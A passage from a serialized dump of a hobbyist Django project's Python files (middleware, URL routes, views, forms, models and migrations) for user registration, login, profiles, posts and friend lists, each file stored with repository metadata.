redirect\n\n\nurl_complie_regex = [re.compile(url) for url in settings.ALLOW_URLS]\nclass LoginMiddleware(object):\n\t\"\"\"\n\t\"\"\"\n\tdef process_view(self, request, view_func, view_args, view_kwargs):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\t#import pdb ;pdb.set_trace()\n\t\tprint request.path\n\t\tprint request.path.lstrip('/').rstrip('/')\n\t\t#import pdb ;pdb.set_trace()\n\t\tif not request.user.is_authenticated() and request.path.lstrip('/').rstrip('/') == 'auth_sys/forgotpassword':\n\t\t\treturn None\n\t\telif not request.user.is_authenticated() and not any( [item.match(request.path.lstrip('/').rstrip('/')) for item in url_complie_regex]):\n\t\t\treturn redirect(settings.LOGIN_URL)\n\t\telif request.user.is_authenticated() and any( item.match(request.path) for item in url_complie_regex):\n\t\t\treturn redirect('/auth_sys/')\n\t\telse:\n\t\t\treturn None" }, { "alpha_fraction": 0.6280276775360107, "alphanum_fraction": 0.6280276775360107, "avg_line_length": 27.950000762939453, "blob_id": "79f933f1b754d9b0f460ac926d7cff938379ee1e", "content_id": "9480e882e0f4ddefc33a12d264ad8ca9b271f446", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 578, "license_type": "no_license", "max_line_length": 97, "num_lines": 20, "path": "/auehentication_system/post_app/urls.py", "repo_name": "mjayant/AuthenticationSystem", "src_encoding": "UTF-8", "text": "from django.conf.urls import include, url\nfrom .views import HomeTemplate\nfrom . 
import views\n# from django.contrib.auth.views import (login, \n# logout ,\n# password_reset,\n# password_reset_done,\n# password_reset_confirm,\n# password_reset_complete,\n# )\n\nurlpatterns = [\n # Examples:\n # url(r'^$', 'auehentication_system.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^$', HomeTemplate.as_view(), name='home'),\n url(r'^connect/(?P<operation>.+)/(?P<pk>\\d+)/$', views.change_friends, name='change_friends')\n\n ]" }, { "alpha_fraction": 0.6794094443321228, "alphanum_fraction": 0.6802003979682922, "avg_line_length": 28.850393295288086, "blob_id": "c59e249c1d147d41e9fa4075f69bb9d64ee06748", "content_id": "3bbd9932c0758cf8047f401ff2c55d457cfa87a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3793, "license_type": "no_license", "max_line_length": 112, "num_lines": 127, "path": "/auehentication_system/autehntication_app/views.py", "repo_name": "mjayant/AuthenticationSystem", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, redirect\nfrom django.contrib.auth.forms import UserChangeForm, PasswordChangeForm, AuthenticationForm\nfrom .forms import CustomUserCreationForm, CustomUserChangeForm, UserProfileForm\nfrom .models import UserProfile\nfrom django.contrib import messages\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.urlresolvers import reverse\nfrom django.forms import inlineformset_factory\nfrom django.contrib.auth.models import User\n\n# Create your views here.\n\n\n# def home(request):\n# \t\"\"\"\n# \t\"\"\"\n# \treturn render(request, 'home.html', {})\n\n# def login(request):\n# \t\"\"\"\n# \t\"\"\"\n# \tform = AuthenticationForm(request.POST or None)\n# \tcontext = {}\n# \tcontext['form'] = form\n# \tif request.method == 'POST':\n# \t\t#import pdb ;pdb.set_trace()\n# \t\tif form.is_valid():\n# \t\t\tinstance = form.save(commit=False)\n# \t\t\tinstance.save()\n# \t\t\treturn redirect('/auth_sys')\n# \t\t# else:\n# \t\t# \tmessages.error(request, \"Error\")\n# \telse:\n\n# \t\tif request.user.is_authenticated():\n# \t\t\tredirect('/auth_sys')\n\n# \treturn render(request, 'login.html', context)\n\ndef register(request):\n\t\"\"\"\n\t\"\"\"\n\tform = CustomUserCreationForm(request.POST or None, request.FILES or None)\n\tcontext = {}\n\tcontext['form'] = form\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.save()\n\t\treturn redirect(reverse('login'))\n\telse:\n\t\tmessages.error(request, \"Error\")\n\n\treturn render(request, 'register.html', context)\n\n\n#@login_required\ndef view_profile(request, pk=None):\n\t\"\"\"\n\t\"\"\"\n\t#import pdb ;pdb.set_trace()\n\tif pk:\n\t\tuser = User.objects.get(pk=pk)\n\t\n\telse:\n\t\tuser = request.user\n\tif request.method == 'POST':\n\t\treturn redirect(reverse('edit_profilee'))\n\t\t#return redirect('/auth_sys/editprofile')\n\treturn render(request, 'view_profile.html',{'user':user})\n\n#@login_required\ndef edit_profile(request):\n \"\"\"\n \"\"\"\n user_form = CustomUserChangeForm(instance=request.user)\n ProfileInlineFormSet = inlineformset_factory(User, UserProfile, fields=('website','city'), can_delete=False)\n formset = ProfileInlineFormSet(instance=request.user)\n context = {}\n #import pdb ;pdb.set_trace()\n if request.method == 'POST':\n user_form = CustomUserChangeForm(request.POST, request.FILES, instance=request.user)\n formset = ProfileInlineFormSet(request.POST, request.FILES, 
instance=request.user) \n if user_form.is_valid():\n created_user = user_form.save(commit=False)\n formset = ProfileInlineFormSet(request.POST, request.FILES, instance=created_user)\n \n if formset.is_valid():\n created_user.save()\n formset.save()\n return redirect(reverse('view_profile'))\n else:\n messages.error(request, \"Error\")\n \n\n context['user_form'] = user_form\n context['formset'] = formset\n # else:\n # form = CustomUserChangeForm(instance=request.user)\n # context['form'] = form\n # profile = UserProfile.objects.create(user=request.user)\n # form1 = UserProfileForm(instance=profile)\n # context['form1'] = form1\n\n return render(request, 'edit_profilee.html',context)\n\n#@login_required\ndef changePassword(request):\n\t\"\"\"\n\t\"\"\"\n\tcontext = {}\n\tif request.method == 'POST':\n\t\tform = PasswordChangeForm(data=request.POST, user=request.user)\n\t\tcontext['form'] = form\n\t\tif form.is_valid():\n\t\t\tinstance = form.save(commit=False)\n\t\t\tinstance.save()\n\t\t\tupdate_session_auth_hash(request, form.user)\n\t\t\treturn redirect(reverse('view_profile'))\n\t\t\t#return redirect('/auth_sys/viewprofile')\n\t\telse:\n\t\t\tmessages.error(request, \"Error\")\n\telse:\n\t\tform = PasswordChangeForm(user=request.user)\n\t\tcontext['form'] = form\n\n\treturn render(request, 'password_change.html',context)\n\n\n" }, { "alpha_fraction": 0.6022944450378418, "alphanum_fraction": 0.6347992420196533, "avg_line_length": 26.526315689086914, "blob_id": "a2a175d6fad2cda4d9da001d5c26cb4cf23b2872", "content_id": "040cbe4f93441e5bb9b529a301a1a19fffd4d6cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 523, "license_type": "no_license", "max_line_length": 158, "num_lines": 19, "path": "/auehentication_system/autehntication_app/migrations/0003_userprofile_image.py", "repo_name": "mjayant/AuthenticationSystem", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('autehntication_app', '0002_auto_20170617_1204'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='userprofile',\n name='image',\n field=models.ImageField(upload_to=b'C:\\\\Users\\\\jaymishr\\\\DjangoProject\\\\AuthenticationSystem\\\\auehentication_system\\\\static\\\\images', blank=True),\n ),\n ]\n" }, { "alpha_fraction": 0.6835442781448364, "alphanum_fraction": 0.6835442781448364, "avg_line_length": 23.45070457458496, "blob_id": "52be12ef8cfa9993121ef71030c42d944eaa7967", "content_id": "3b178dd275ba71895c279355faf693c2062ae324", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1738, "license_type": "no_license", "max_line_length": 62, "num_lines": 71, "path": "/auehentication_system/post_app/views.py", "repo_name": "mjayant/AuthenticationSystem", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, redirect\nfrom django.views.generic import TemplateView\nfrom .forms import PostForm\nfrom .models import Post, Friend\nfrom django.contrib import messages\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.models import User\n\n\n# Create your views here.\n\nclass HomeTemplate(TemplateView):\n\t\"\"\"\n\t\"\"\"\n\n\tdef get(self, request):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\tcontext = {}\n\t\tcontext['form'] = PostForm()\n\t\tpost_data = Post.objects.all().order_by('-created')\n\t\tcontext['post_data'] = 
post_data\n\t\tuser_lst = User.objects.all().exclude(id=request.user.id)\n\n\t\ttry:\n\t\t\tfriend_id = Friend.objects.get(current_user=request.user)\n\t\t\tfriends = friend_id.users.all()\n\t\texcept Friend.DoesNotExist:\n\t\t\tfriends = set()\n\n\t\tcontext['friends'] = friends\n\n\t\tuser_lst = set(user_lst) - set(friends)\n\t\tcontext['user_lst'] = user_lst\n\t\treturn render(request, 'home.html', context)\n\n\tdef post(self, request):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\tform = PostForm(request.POST or None, request.FILES or None)\n\t\t#form = myForm(request.POST or None, request.FILES or None)\n\t\ttext = ''\n\t\tcontext = {'form':form}\n\t\t#import pdb ;pdb.set_trace()\n\t\tif form.is_valid():\n\t\t\ttext = form.cleaned_data['post']\n\t\t\tpost = form.save(commit=False)\n\t\t\tpost.user = request.user\n\t\t\t#import pdb ;pdb.set_trace()\n\t\t\tpost.save()\n\t\t\t\n\t\t\treturn redirect(reverse('home'))\n\n\t\t\t#return reverse('home')\n\t\t# else:\n\t\t# \tmessages.error(request, \"Error\")\n\t\t\n\t\treturn render(request,'home.html', context)\n\n\ndef change_friends(request, operation, pk):\n\t\"\"\"\n\t\"\"\"\n\tif operation == 'add':\n\t\tfriend = User.objects.get(pk=pk)\n\t\tFriend.make_friend(request.user, friend)\n\telse:\n\n\t\tfriend = User.objects.get(pk=pk)\n\t\tFriend.lose_friend(request.user, friend)\n\treturn redirect(reverse('home'))\t\n\n" }, { "alpha_fraction": 0.6501064300537109, "alphanum_fraction": 0.6600425839424133, "avg_line_length": 47.55172348022461, "blob_id": "5f892471c42610b498008e6a280e5604296338bd", "content_id": "09b88dac18628c6d4ae6936a7a513b1455396c18", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1409, "license_type": "no_license", "max_line_length": 164, "num_lines": 29, "path": "/auehentication_system/autehntication_app/urls.py", "repo_name": "mjayant/AuthenticationSystem", "src_encoding": "UTF-8", "text": "from django.conf.urls import include, url\nfrom . 
import views\nfrom django.contrib.auth.views import (login, \n logout ,\n password_reset,\n password_reset_done,\n password_reset_confirm,\n password_reset_complete,\n )\n\nurlpatterns = [\n # Examples:\n # url(r'^$', 'auehentication_system.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n #url(r'^$', views.home, name='home'),\n url(r'^login/$', login, {'template_name':'login.html'}, name='login'),\n url(r'^logout/$', logout, {'template_name': 'logout.html'}, name='logout'),\n url(r'^register/$',views.register, name='register'),\n url(r'^viewprofile/$',views.view_profile, name='view_profile'),\n url(r'^viewprofile/(?P<pk>\\d+)/$',views.view_profile, name='view_profile_with_pk'),\n url(r'^editprofile/$',views.edit_profile, name='edit_profilee'),\n url(r'^editprofile/password/$',views.changePassword, name='changePassword'),\n url(r'^forgotpassword/$',password_reset, {'template_name': 'password_reset_form.html'}, name='forgotpassword'),\n url(r'^forgotpassword/done$',password_reset_done, name='password_reset_done'),\n url(r'^passwordresetconfirm/(?P<uidb64>[0-9A-Za-z_\\-]+)/(?P<token>[0-9A-Za-z]{1,13}-[0-9A-Za-z]{1,20})$',password_reset_confirm, name='password_reset_confirm'),\n url(r'^passwordresetconfirm/complete$',password_reset_complete, name='password_reset_complete'), \n\n]\n\n" }, { "alpha_fraction": 0.739130437374115, "alphanum_fraction": 0.739130437374115, "avg_line_length": 16.88888931274414, "blob_id": "2605b71fd284fc86948a1b6aef3966c6d86a4725", "content_id": "8aca8a6cd39130507eeae05089b4b495c8e16850", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 161, "license_type": "no_license", "max_line_length": 45, "num_lines": 9, "path": "/auehentication_system/auehentication_system/views.py", "repo_name": "mjayant/AuthenticationSystem", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, redirect\nfrom django.contrib import messages\n\n\ndef redirect_login(request):\n\t\"\"\"\n\t\"\"\"\n\t\n\treturn redirect('/auth_sys/login')\n" }, { "alpha_fraction": 0.6478067636489868, "alphanum_fraction": 0.65479975938797, "avg_line_length": 25.21666717529297, "blob_id": "e9ca7b402f2cfb5a800ea76ef2424905df3af6a2", "content_id": "422475b717b5619f908c79036050bc130e123b79", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1573, "license_type": "no_license", "max_line_length": 75, "num_lines": 60, "path": "/auehentication_system/post_app/models.py", "repo_name": "mjayant/AuthenticationSystem", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom datetime import datetime \n#from django.db.models.signals import post_save\nfrom django.conf import settings\n\nclass Post(models.Model):\n\t\"\"\"\n\t\"\"\"\n\n\tpost = models.TextField(max_length=100, blank=False)\n\tuser = models.ForeignKey(User, default=1)\n\tcreated = models.DateTimeField(auto_now_add=True)\n\tupdated = models.DateTimeField(auto_now=True)\n\n\n\tdef __str__(self):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\treturn self.user.username\n\n\nclass Publication(models.Model):\n title = models.CharField(max_length=30)\n\n def __str__(self): # __unicode__ on Python 2\n return self.title\n\n class Meta:\n ordering = ('title',)\n\nclass Article(models.Model):\n headline = models.CharField(max_length=100)\n publications = models.ManyToManyField(Publication)\n\n def __str__(self): # __unicode__ on Python 2\n return self.headline\n\n class Meta:\n ordering 
= ('headline',)\n\n\nclass Friend(models.Model):\n users = models.ManyToManyField(User)\n current_user = models.ForeignKey(User, related_name='owner', null=True)\n\n @classmethod\n def make_friend(cls, current_user, new_friend):\n friend, created = cls.objects.get_or_create(\n current_user=current_user\n )\n friend.users.add(new_friend)\n\n @classmethod\n def lose_friend(cls, current_user, new_friend):\n \t#import pdb ;pdb.set_trace()\n friend, created = cls.objects.get_or_create(\n current_user=current_user\n )\n friend.users.remove(new_friend)\n" }, { "alpha_fraction": 0.6579973697662354, "alphanum_fraction": 0.6579973697662354, "avg_line_length": 16.9069766998291, "blob_id": "f428881267f25e9f9ee72627ad2c2884c85b6438", "content_id": "29e54d88720c4921c648ee172acc045bc7b364b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 769, "license_type": "no_license", "max_line_length": 70, "num_lines": 43, "path": "/auehentication_system/autehntication_app/forms.py", "repo_name": "mjayant/AuthenticationSystem", "src_encoding": "UTF-8", "text": "from django import forms\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserCreationForm, UserChangeForm\nfrom .models import UserProfile\n\nclass CustomUserCreationForm(UserCreationForm):\n\t\"\"\"\n\t\"\"\"\n\temail = forms.EmailField(required=True)\n\n\tclass Meta:\n\t\tmodel = User\n\t\tfields = (\n\t\t\t\t\t'username',\n\t\t\t\t\t'first_name',\n\t\t\t\t\t'last_name',\n\t\t\t\t\t'email',\n\t\t\t\t\t'password1',\n\t\t\t\t\t'password2'\n\t\t)\n\n\nclass CustomUserChangeForm(UserChangeForm):\n\t\"\"\"\n\t\"\"\"\n\t#email = forms.EmailField(required=True)\n\n\tclass Meta:\n\t\tmodel = User\n\t\tfields = (\n\t\t\t\t\t'username',\n\t\t\t\t\t'first_name',\n\t\t\t\t\t'last_name',\n\t\t\t\t\t'email',\n\t\t\t\t\t'password',\n\n\t\t)\n\n\nclass UserProfileForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = UserProfile\n\t\tfields = ('website', 'city', 'image')" }, { "alpha_fraction": 0.7240437269210815, "alphanum_fraction": 0.7349726557731628, "avg_line_length": 24.275861740112305, "blob_id": "151033e8a24a69da5fe7ed5a9c273625ac32bfff", "content_id": "085359a4833a9f19f3b9d566ffef4976f35c3240", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 732, "license_type": "no_license", "max_line_length": 85, "num_lines": 29, "path": "/auehentication_system/autehntication_app/models.py", "repo_name": "mjayant/AuthenticationSystem", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import post_save\nfrom django.conf import settings\n\nclass UserProfile(models.Model):\n\t\"\"\"\n\t\"\"\"\n\tuser = models.OneToOneField(User)\n\tdescription = models.CharField(max_length=100)\n\twebsite = models.URLField()\n\tbirth_date = models.DateField(auto_now_add=True)\n\tcity = models.CharField(max_length=50)\n\timage = models.ImageField(upload_to=settings.MEDIA_ROOT, blank=True, max_length=500)\n\n\tdef __str__(self):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\treturn self.user.username\n\n\ndef save_profile(sender, **kwargs):\n\t\"\"\"\n\t\"\"\"\n\tif kwargs['created']:\n\t\tuser_profile = UserProfile.objects.create(user=kwargs['instance'])\n\n\npost_save.connect(save_profile, sender=User)" }, { "alpha_fraction": 0.5372596383094788, "alphanum_fraction": 0.6033653616905212, "avg_line_length": 28.714284896850586, "blob_id": "75c46c19cf450e986b600b6f2d648ae35eb56e9c", 
"content_id": "6df4793094f0f83ebf434ec6dc476a4c065c8df1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 832, "license_type": "no_license", "max_line_length": 130, "num_lines": 28, "path": "/auehentication_system/post_app/migrations/0003_auto_20170626_1801.py", "repo_name": "mjayant/AuthenticationSystem", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('post_app', '0002_auto_20170626_1756'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='post',\n name='created',\n field=models.DateTimeField(default=datetime.datetime(2017, 6, 26, 12, 31, 21, 978000, tzinfo=utc), auto_now_add=True),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='post',\n name='updated',\n field=models.DateTimeField(default=datetime.datetime(2017, 6, 26, 12, 31, 32, 335000, tzinfo=utc), auto_now=True),\n preserve_default=False,\n ),\n ]\n" }, { "alpha_fraction": 0.7095435857772827, "alphanum_fraction": 0.7095435857772827, "avg_line_length": 20.81818199157715, "blob_id": "c5f8201f316763f2b40701e066dffcfd8d199096", "content_id": "00bed7dc650045448258e44929dc2e047b352f92", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 241, "license_type": "no_license", "max_line_length": 103, "num_lines": 11, "path": "/auehentication_system/post_app/forms.py", "repo_name": "mjayant/AuthenticationSystem", "src_encoding": "UTF-8", "text": "from django import forms\nfrom .models import Post\n\n\nclass PostForm(forms.ModelForm):\n\n\tpost = forms.CharField(required=True, widget=forms.TextInput(attrs={'placeholder': 'Write Post....'}))\n\n\tclass Meta:\n\t\tmodel = Post\n\t\tfields = ('post',)\n\n" } ]
13
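LoginMiddleware in autehntication_app/middleware.py above reads `settings.ALLOW_URLS` and `settings.LOGIN_URL`, neither of which appears in the record. A hypothetical settings.py fragment consistent with that code — the entries are compiled with `re.compile` and matched against `request.path` with slashes stripped, and it is old-style `process_view` middleware, hence `MIDDLEWARE_CLASSES`:

```python
# Hypothetical values -- not taken from the repository.
LOGIN_URL = '/auth_sys/login/'

# Paths reachable without authentication, as regexes over the stripped path
# (forgotpassword is already special-cased inside the middleware itself).
ALLOW_URLS = [
    r'^auth_sys/login$',
    r'^auth_sys/register$',
]

MIDDLEWARE_CLASSES = (
    # ... Django defaults ...
    'autehntication_app.middleware.LoginMiddleware',
)
```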
stefanesser/twitter_giveaway_2016
https://github.com/stefanesser/twitter_giveaway_2016
5035b0626c3f6b4d71f7b9714af75dbca880ff1a
bf203b8b39b839a98c18bd3d9fa246a20a4e1519
5267f67704d5022996af7433b545832e9f2a4263
refs/heads/master
2021-01-12T06:10:53.513957
2016-12-25T12:18:21
2016-12-25T12:18:21
77,324,409
10
1
null
null
null
null
null
[ { "alpha_fraction": 0.7136363387107849, "alphanum_fraction": 0.7136363387107849, "avg_line_length": 53.5, "blob_id": "41ed4022b721928a72775deb7ed93c43238611da", "content_id": "ddf8667b3a007df67b6c40df232f1bba41ef50d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 220, "license_type": "no_license", "max_line_length": 58, "num_lines": 4, "path": "/keys.py", "repo_name": "stefanesser/twitter_giveaway_2016", "src_encoding": "UTF-8", "text": "\nCONSUMER_KEY = \"get from https://apps.twitter.com/\"\nCONSUMER_SECRET = \"get from https://apps.twitter.com/\"\nACCESS_TOKEN = \"get from https://apps.twitter.com/\"\nACCESS_TOKEN_SECRET = \"get from https://apps.twitter.com/\"\n\n" }, { "alpha_fraction": 0.772857129573822, "alphanum_fraction": 0.7928571701049805, "avg_line_length": 62.54545593261719, "blob_id": "115c9e795a691d33451ed1bdf472f7b898793ba3", "content_id": "d1032dd0bc57534286a9dab7070b958d01bea9ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 700, "license_type": "no_license", "max_line_length": 150, "num_lines": 11, "path": "/README.md", "repo_name": "stefanesser/twitter_giveaway_2016", "src_encoding": "UTF-8", "text": "These scripts were used in the @i0n1c AppleTV 4 giveaway on 2016/12/25.\n\nFeel free to use these scripts for whatever you want they are \nmostly based on the examples from the tweepy documentation.\nThat being said you need to have tweepy installed for these scripts\nto work. Furthermore you need to fill in keys.py with API keys that\nyou get at https://apps.twitter.com/\n\n1. the more followers you have the longer the list generation takes due to twitter rate limits\n2. selecting among all followers is a bad way to do a giveaway (private accounts, inactive users, fake followers, company profiles following you, ...)\n3. 
for next giveaway better to select among active followers detected via retweets\n\n" }, { "alpha_fraction": 0.6980262994766235, "alphanum_fraction": 0.7013157606124878, "avg_line_length": 35.21428680419922, "blob_id": "d61780416ebef7b4bbb29fed5827ba62366599b1", "content_id": "e086b5388c8ebf247016352e567200d4c950d599", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1520, "license_type": "no_license", "max_line_length": 101, "num_lines": 42, "path": "/pickRandomFollower.py", "repo_name": "stefanesser/twitter_giveaway_2016", "src_encoding": "UTF-8", "text": "# feel free to use this code for whatever you want\n# it is mostly based on small code snippets that demonstrate the usage of tweepy\n# purpose of this script is to read twitter follower ids from a pickled file\n# once loaded the script will randomly choose one follower and print out:\n# name, profile url, follower count, friends count and statuses count\n# WARNING: selected numbers are from 0 to X\n\nimport sys\nimport tweepy\nimport pickle\n\nimport keys\nimport random\n\ntry:\n auth = tweepy.OAuthHandler(keys.CONSUMER_KEY, keys.CONSUMER_SECRET)\n auth.set_access_token(keys.ACCESS_TOKEN, keys.ACCESS_TOKEN_SECRET)\n api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True, compression=True)\n \n rnd = random.SystemRandom()\n \n pkl_file = open('follower.pkl', 'rb')\n\n ids = pickle.load(pkl_file)\n \n page = rnd.randint(0, len(ids)-1)\n entry = rnd.randint(0, len(ids[page])-1)\n \n print \"randomly selecting page %u of %u pages\" % (page, len(ids))\n print \"randomly selecting entry %u of %u entries in page %u\" % (entry, len(ids[page]), page)\n \n user = api.get_user(user_id=ids[page][entry])\n print \"randomly selected user is: %s\" % user.screen_name\n print \"URL to this user: https://www.twitter.com/%s\" % user.screen_name\n print \"Followers: %u\" % user.followers_count\n print \"Friends: %u\" % user.friends_count\n print \"Statuses: %u\" % user.statuses_count\n\nexcept tweepy.TweepError:\n print tweepy.TweepError.message\nexcept:\n print sys.exc_info()" }, { "alpha_fraction": 0.6902573704719543, "alphanum_fraction": 0.6957720518112183, "avg_line_length": 31, "blob_id": "5710339c218d65f5ee8b073000cac29d3f76f5c8", "content_id": "9e34a9e5e5401bd547ce597d9f6f230472ce1324", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1088, "license_type": "no_license", "max_line_length": 101, "num_lines": 34, "path": "/followerList.py", "repo_name": "stefanesser/twitter_giveaway_2016", "src_encoding": "UTF-8", "text": "# feel free to use this code for whatever you want\n# it is mostly based on small code snippets that demonstrate the usage of tweepy\n# purpose of this script is to enumerate all follower ids of 'i0n1c' and\n# then pickle them into a file\n# WARNING: sometimes strange TweepError exceptions are thrown at the very end\n\nimport sys\nimport tweepy\nimport pickle\n\nimport keys\n\ntry:\n auth = tweepy.OAuthHandler(keys.CONSUMER_KEY, keys.CONSUMER_SECRET)\n auth.set_access_token(keys.ACCESS_TOKEN, keys.ACCESS_TOKEN_SECRET)\n api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True, compression=True)\n \n follower_cursor = tweepy.Cursor(api.followers_ids, id = \"i0n1c\")\n print \"type[follower_cursor]=\", type(follower_cursor)\n ids = []\n count = 0\n for p in follower_cursor.pages():\n ids.append(p)\n count += len(p)\n print \"At %u\" % count\n \n output = open('follower.pkl', 
'wb')\n pickle.dump(ids, output, -1)\n output.close()\n \nexcept tweepy.TweepError:\n print tweepy.TweepError.message\nexcept:\n print sys.exc_info()\n" } ]
4
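pickRandomFollower.py above draws a random page and then a random entry within it, which slightly over-weights ids on the last (usually shorter) page — one more caveat alongside those listed in the README. A sketch that flattens the pickled pages first, so every follower id is equally likely (assumes the same follower.pkl produced by followerList.py):

```python
import pickle
import random

with open('follower.pkl', 'rb') as f:
    pages = pickle.load(f)  # list of pages, each a list of follower ids

ids = [uid for page in pages for uid in page]
winner_id = random.SystemRandom().choice(ids)
print("randomly selected user id: %u" % winner_id)
```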
ritzvik/SingerRecognization
https://github.com/ritzvik/SingerRecognization
9735579b1dcacd4df2d080b98ff42233efe92352
12631367991d6929a958850ab5ff2a1dd9dad394
dea2d1509174824df5420af2445aaf1cfc94e489
refs/heads/master
2021-08-07T18:22:03.581492
2017-11-08T18:07:23
2017-11-08T18:07:23
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6934956908226013, "alphanum_fraction": 0.7077516913414001, "avg_line_length": 30.476634979248047, "blob_id": "101a7ad8df2538ede9fb0db63c58fcea2921d023", "content_id": "da0bfc76012bef85e861c822443e6301b9afa597", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3367, "license_type": "no_license", "max_line_length": 98, "num_lines": 107, "path": "/extract_audio_data.py", "repo_name": "ritzvik/SingerRecognization", "src_encoding": "UTF-8", "text": "#REF : https://aqibsaeed.github.io/2016-09-03-urban-sound-classification-part-1/\n#REF : https://docs.python.org/2/library/multiprocessing.html\n#REF : https://www.tensorflow.org/serving/serving_basic\n\nimport sys\nimport glob\nimport os\nimport librosa\n# import librosa.display\nimport numpy as np \n#import tensorflow as tf \n#import sklearn\nfrom multiprocessing import Process, Queue, Lock\nimport pickle\n\ndef extract_feature(file_name, srate):\n\tprint(file_name)\n\tX, sample_rate = librosa.load(file_name,sr=srate)\n\tstft = np.abs(librosa.stft(X))\n\tmfccs = np.mean(librosa.feature.mfcc(y=X, sr=sample_rate, n_mfcc=40).T,axis=0)\n\tchroma = np.mean(librosa.feature.chroma_stft(S=stft, sr=sample_rate).T,axis=0)\n\tmel = np.mean(librosa.feature.melspectrogram(X, sr=sample_rate).T,axis=0)\n\tcontrast = np.mean(librosa.feature.spectral_contrast(S=stft, sr=sample_rate,fmin=10).T,axis=0)\n\ttonnetz = np.mean(librosa.feature.tonnetz(y=librosa.effects.harmonic(X),sr=sample_rate).T,axis=0)\n\treturn mfccs,chroma,mel,contrast,tonnetz,get_name(file_name)\n\ndef segregate():\n\ttrain_files =[]\n\ttest_files =[]\n\tfor i,fname in enumerate(os.listdir()):\n\t\tif fname.endswith('.wav'):\n\t\t\tif fname[:2]=='t-':\n\t\t\t\tif fname[-5]=='t':\n\t\t\t\t\ttest_files.append(fname)\n\t\t\telse:\n\t\t\t\ttrain_files.append(fname)\n\treturn train_files,test_files\n\ndef get_name(file_name):\n\tif file_name[:2]=='t-':\n\t\treturn file_name[2:].split('_')[0]\n\telse:\n\t\treturn file_name.split('_')[0]\n\n\ndef return_singer_index(singer_name,singer_names):\n\tif singer_name in singer_names:\n\t\treturn singer_names.index(singer_name)\n\telse:\n\t\tsinger_names.append(singer_name)\n\t\treturn singer_names.index(singer_name)\n\ndef parse_extension(fname, srate, out_q, lock):\n\tlock.acquire()\n\tmfccs,chroma,mel,contrast,tonnetz,sname = extract_feature(fname, srate)\n\tout_q.put([mfccs,chroma,mel,contrast,tonnetz,sname])\n\tlock.release()\n\ndef parse(file_names_list, srate, n_threads, singer_names):\n\tout_q = Queue()\n\tfeatures, labels = np.empty((0,193)), np.empty(0)\n\tlocks = [Lock() for i in range(0,n_threads)]\n\t#\n\tfor i,fname in enumerate(file_names_list):\n\t\tProcess(target=parse_extension, args=(fname,srate,out_q,locks[i%n_threads])).start()\n\t#\n\tfor i in range(0,n_threads):\n\t\tlocks[i].acquire(block=True, timeout=3.0)\n\t#\n\tprint(\"~~~\")\n\tfor i,fname in enumerate(file_names_list):\n\t\ttmp = out_q.get()\n\t\t#mfccs,chroma,mel,contrast,tonnetz,sname = tmp[0],tmp[1],tmp[2],tmp[3],tmp[4],tmp[5]\n\t\text_features = np.hstack(tmp[:-1])\n\t\tfeatures = np.vstack([features,ext_features])\n\t\tlabels = np.append(labels,return_singer_index(tmp[5],singer_names))\n\treturn np.array(features), np.array(labels, dtype=np.int)\n\ndef one_hot_encode(labels):\n\tn_labels = len(labels)\n\tn_unique_labels = len(np.unique(labels))\n\tone_hot_encode = np.zeros((n_labels,n_unique_labels))\n\tone_hot_encode[np.arange(n_labels), labels] = 1\n\treturn one_hot_encode\n\ndef 
